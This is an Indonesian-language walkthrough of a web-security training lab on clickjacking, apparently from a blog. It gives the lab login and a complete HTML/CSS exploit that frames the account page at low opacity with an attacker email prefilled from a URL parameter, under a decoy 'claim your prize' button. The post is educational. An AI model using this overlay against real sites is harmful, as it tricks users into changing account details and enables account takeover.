Post cover image

June 12, 2026

Lab 14: Clickjacking with form input data prefilled from a URL parameter

Tujuan

Tkacala

1 min read

Tujuan

Buat korban mengklik tombol palsu yang sebenarnya adalah tombol "Update email" di dalam iframe, sehingga email korban berubah tanpa sadar.

Langkah 1: Login & Buka Exploit Server

  1. Buka lab.
  2. Login pakai wiener : peter.
  3. Klik tombol "Go to exploit server".
None

Langkah 2: Buat Kode Exploit

Di kolom "Body" exploit server, isi dengan :

<style>
    iframe {
        position: relative;
        width: 1250px;
        height: 700px;
        opacity: 0.1;
        z-index: 2;
        border: none;
    }
    div {
        position: absolute;
        top: 480px;
        left: 80px;
        z-index: 1;
        font-size: 24px;
        color: black;
        background: white;
        padding: 15px;
        border: 2px solid red;
    }
</style>
<div>Klik di sini untuk klaim hadiah!</div>
<iframe src="https://0ae50054032898be80f60337000600e7.web-security-academy.net/my-account?email=hacker@evil.com"></iframe>

Langkah 3: Atur Posisi Tombol

  1. Klik "Store" di exploit server.
  2. Klik "View exploit".
  3. Kita bakal liat halaman my-account di dalam iframe (transparan) + teks "Klik di sini...".
  4. Kalau posisi tombol belum pas, kita ubah nilai "top:" dan "left:" di CSS dicoba-coba aja sampai tombol merah tepat menutupi tombol "Update email".
None

Langkah 4: Deliver & Solved

  1. Klik "Store" (simpan perubahan kalau kita sudah atur posisi).
  2. Klik "Deliver to victim".
  3. Balik ke halaman lab, refresh.
  4. Lab solved.
None